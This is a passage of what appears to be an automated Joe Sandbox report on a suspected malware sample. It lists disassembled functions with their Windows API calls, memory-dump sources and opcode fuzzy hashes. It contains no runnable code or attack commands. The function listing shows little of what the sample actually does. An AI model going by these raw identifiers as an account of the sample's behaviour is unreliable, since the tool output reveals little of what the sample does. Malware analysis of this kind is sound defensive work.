                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Initstd::locale::_
                                  • String ID:
                                  • API String ID: 1620887387-0
                                  • Opcode ID: 0c173d5caec885834f1ca079fb9a3f4cd39e4802722259f1944fff307c9b3f42
                                  • Instruction ID: bb79945e1b33a062876b9f4fc9bfd4ceefe74c0201631f967b5295d4923d40ac
                                  • Opcode Fuzzy Hash: 0c173d5caec885834f1ca079fb9a3f4cd39e4802722259f1944fff307c9b3f42
                                  • Instruction Fuzzy Hash: 2EF0DAB4D01208EBDB04EF95D54569DBBB4AB44305F1080BAD80577381D7796F15DB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 004030F0: std::_Lockit::_Lockit.LIBCPMT ref: 004030FB
                                    • Part of subcall function 004030F0: int.LIBCPMTD ref: 0040310D
                                    • Part of subcall function 004030F0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040319E
                                  • ctype.LIBCPMTD ref: 0040C481
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_ctype
                                  • String ID:
                                  • API String ID: 2260400482-0
                                  • Opcode ID: 559e00e182da1efc1ee844143e54b5289b8d7ac1d90be60e135f66b04a4fc01f
                                  • Instruction ID: e2f409fb53aec5c17ccbf3e1a26e35ab223a41ad27f3796d946f1401872551dc
                                  • Opcode Fuzzy Hash: 559e00e182da1efc1ee844143e54b5289b8d7ac1d90be60e135f66b04a4fc01f
                                  • Instruction Fuzzy Hash: 90E01AB6C0010CAACB04FBA5D8528AEBB78AA50204F0045BEA91567282EA346A149799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ___crtInitializeCriticalSectionEx.LIBCPMT ref: 0040ED72
                                    • Part of subcall function 0040F42F: InitializeCriticalSectionEx.KERNELBASE(?,?,?,?,?,0040ED77,?,00000FA0,00000000), ref: 0040F451
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalInitializeSection$___crt
                                  • String ID:
                                  • API String ID: 348918074-0
                                  • Opcode ID: bb96c681368f379992a3cfb1baa5672ed95cdbd770d999199ec2d46a85b23992
                                  • Instruction ID: 81ccd7ab2f72141b8f239c17b5140be84f2a54311d37a3273f4849baef594561
                                  • Opcode Fuzzy Hash: bb96c681368f379992a3cfb1baa5672ed95cdbd770d999199ec2d46a85b23992
                                  • Instruction Fuzzy Hash: 5EB0927168420C36D9202582EC03B263A184751B64E800035BA0C2CAE1A9A265A8508A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 00240777
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411940280.0000000000240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_240000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                  • Instruction ID: 3b4288ff085a1ff28d00ca07eb53c5ad4003a470c6c7735394b11ded1c37d44a
                                  • Opcode Fuzzy Hash: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                  • Instruction Fuzzy Hash: 33110670D10219AFDB04EFA8CC89BAEFBB4EB04304F2084A5EA15B7291D2755A949F91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0041D144: GetLastError.KERNEL32(00000000,?,00422D57), ref: 0041D148
                                    • Part of subcall function 0041D144: SetLastError.KERNEL32(00000000,00000000,00000000,00000005,000000FF), ref: 0041D1EA
                                  • GetACP.KERNEL32(?,?,?,?,?,?,0041B708,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 004271AA
                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0041B708,?,?,?,00000055,?,-00000050,?,?), ref: 004271E1
                                  • _wcschr.LIBVCRUNTIME ref: 00427275
                                  • _wcschr.LIBVCRUNTIME ref: 00427283
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00427344
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                  • String ID: utf8
                                  • API String ID: 4147378913-905460609
                                  • Opcode ID: 59a1193c5fd235517ba1f104041047f1f23dfd82996aed35ec7635ed8f74d4e5
                                  • Instruction ID: 9fd03cb1456cb38658fe38fed3da33ca446464b993f4dd20f80c9fffb3498d2f
                                  • Opcode Fuzzy Hash: 59a1193c5fd235517ba1f104041047f1f23dfd82996aed35ec7635ed8f74d4e5
                                  • Instruction Fuzzy Hash: C9710771704222AAEB24AB75EC42BB773A8EF45704F94406FF905D7281EB7CE841C669
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00427B96,00000002,00000000,?,?,?,00427B96,?,00000000), ref: 0042791D
                                  • GetLocaleInfoW.KERNEL32(?,20001004,00427B96,00000002,00000000,?,?,?,00427B96,?,00000000), ref: 00427946
                                  • GetACP.KERNEL32(?,?,00427B96,?,00000000), ref: 0042795B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID: ACP$OCP
                                  • API String ID: 2299586839-711371036
                                  • Opcode ID: 8e23217b7e23a1a0e8f98d1ad00557f1d828ea6f4db9ff5ed9e711d7bd3462b8
                                  • Instruction ID: 5290885cfc00b83c3f91c7a702aa8d530f52b881acbc8a7619dbb9977bacb9d1
                                  • Opcode Fuzzy Hash: 8e23217b7e23a1a0e8f98d1ad00557f1d828ea6f4db9ff5ed9e711d7bd3462b8
                                  • Instruction Fuzzy Hash: 4121F8B2B0C220E6FB349F25E844A9777A7AF54B50BD68036E809D7310E736DD81C358
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0041D144: GetLastError.KERNEL32(00000000,?,00422D57), ref: 0041D148
                                    • Part of subcall function 0041D144: SetLastError.KERNEL32(00000000,00000000,00000000,00000005,000000FF), ref: 0041D1EA
                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00427B68
                                  • IsValidCodePage.KERNEL32(00000000), ref: 00427BA6
                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00427BB9
                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00427C01
                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00427C1C
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                  • String ID:
                                  • API String ID: 415426439-0
                                  • Opcode ID: d7d38c1dbc8375ba807f56712a0814b1f73bb466e4f4d3c4fc6ce9b0d1ddd85b
                                  • Instruction ID: b7a06ed6196ae2854c6a8c05903e04cb68c936f492ae398200924b9b6a2e2900
                                  • Opcode Fuzzy Hash: d7d38c1dbc8375ba807f56712a0814b1f73bb466e4f4d3c4fc6ce9b0d1ddd85b
                                  • Instruction Fuzzy Hash: 6D51A771B04229AFDB10DFA6EC41ABFB7B8FF05704F94446AE900D7290E7789941CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0041D144: GetLastError.KERNEL32(00000000,?,00422D57), ref: 0041D148
                                    • Part of subcall function 0041D144: SetLastError.KERNEL32(00000000,00000000,00000000,00000005,000000FF), ref: 0041D1EA
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042755C
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004275A6
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042766C
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale$ErrorLast
                                  • String ID:
                                  • API String ID: 661929714-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0041493F
                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00414949
                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00414956
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                  • String ID:
                                  • API String ID: 3906539128-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0041D144: GetLastError.KERNEL32(00000000,?,00422D57), ref: 0041D148
                                    • Part of subcall function 0041D144: SetLastError.KERNEL32(00000000,00000000,00000000,00000005,000000FF), ref: 0041D1EA
                                  • EnumSystemLocalesW.KERNEL32(00427508,00000001,00000000,?,-00000050,?,00427B3C,00000000,?,?,?,00000055,?), ref: 00427454
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem
                                  • String ID: <{B
                                  • API String ID: 2417226690-2250851687
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040FF21
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FeaturePresentProcessor
                                  • String ID:
                                  • API String ID: 2325560087-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0041D144: GetLastError.KERNEL32(00000000,?,00422D57), ref: 0041D148
                                    • Part of subcall function 0041D144: SetLastError.KERNEL32(00000000,00000000,00000000,00000005,000000FF), ref: 0041D1EA
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004277AF
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$InfoLocale
                                  • String ID:
                                  • API String ID: 3736152602-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0041D144: GetLastError.KERNEL32(00000000,?,00422D57), ref: 0041D148
                                    • Part of subcall function 0041D144: SetLastError.KERNEL32(00000000,00000000,00000000,00000005,000000FF), ref: 0041D1EA
                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00427724,00000000,00000000,?), ref: 004279B6
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$InfoLocale
                                  • String ID:
                                  • API String ID: 3736152602-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0041D144: GetLastError.KERNEL32(00000000,?,00422D57), ref: 0041D148
                                    • Part of subcall function 0041D144: SetLastError.KERNEL32(00000000,00000000,00000000,00000005,000000FF), ref: 0041D1EA
                                  • EnumSystemLocalesW.KERNEL32(0042775B,00000001,00000000,?,-00000050,?,00427B04,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 004274C7
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem
                                  • String ID:
                                  • API String ID: 2417226690-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00417EBA: EnterCriticalSection.KERNEL32(-0002D51A,?,00419E36,00000000,0043D948,0000000C,00419DFE,?,?,00417F63,?,?,?,0041D2E2,00000001,00000364), ref: 00417EC9
                                  • EnumSystemLocalesW.KERNEL32(0041DF26,00000001,0043DBB8,0000000C,0041E31D,00000000), ref: 0041DF6B
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                  • String ID:
                                  • API String ID: 1272433827-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0041D144: GetLastError.KERNEL32(00000000,?,00422D57), ref: 0041D148
                                    • Part of subcall function 0041D144: SetLastError.KERNEL32(00000000,00000000,00000000,00000005,000000FF), ref: 0041D1EA
                                  • EnumSystemLocalesW.KERNEL32(004272F0,00000001,00000000,?,?,00427B5E,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 004273CE
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem
                                  • String ID:
                                  • API String ID: 2417226690-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0041C27E,?,20001004,00000000,00000002,?,?,0041B870), ref: 0041E455
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: HeapProcess
                                  • String ID:
                                  • API String ID: 54951025-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0042AE81: CreateFileW.KERNEL32(?,00000000,?,0042B271,?,?,00000000), ref: 0042AE9E
                                  • GetLastError.KERNEL32 ref: 0042B2DC
                                  • __dosmaperr.LIBCMT ref: 0042B2E3
                                  • GetFileType.KERNEL32 ref: 0042B2EF
                                  • GetLastError.KERNEL32 ref: 0042B2F9
                                  • __dosmaperr.LIBCMT ref: 0042B302
                                  • CloseHandle.KERNEL32(00000000), ref: 0042B322
                                  • CloseHandle.KERNEL32(004228FC), ref: 0042B46F
                                  • GetLastError.KERNEL32 ref: 0042B4A1
                                  • __dosmaperr.LIBCMT ref: 0042B4A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                  • String ID: H
                                  • API String ID: 4237864984-2852464175
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00408F14
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Exception@8Throw
                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 2005118841-1866435925
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A6A2
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A6AE
                                  • char_traits.LIBCPMTD ref: 0040A6BA
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A6EA
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A6F6
                                  • char_traits.LIBCPMTD ref: 0040A6FF
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A710
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A71C
                                  • char_traits.LIBCPMTD ref: 0040A725
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Base::Concurrency::details::ContextIdentityQueueWork$char_traits
                                  • String ID:
                                  • API String ID: 1941806930-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004031BB
                                  • int.LIBCPMTD ref: 004031CD
                                    • Part of subcall function 00404D30: std::_Lockit::_Lockit.LIBCPMT ref: 00404D46
                                    • Part of subcall function 00404D30: std::_Lockit::~_Lockit.LIBCPMT ref: 00404D70
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040325E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                  • String ID: Ns@
                                  • API String ID: 593203224-4153086589
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
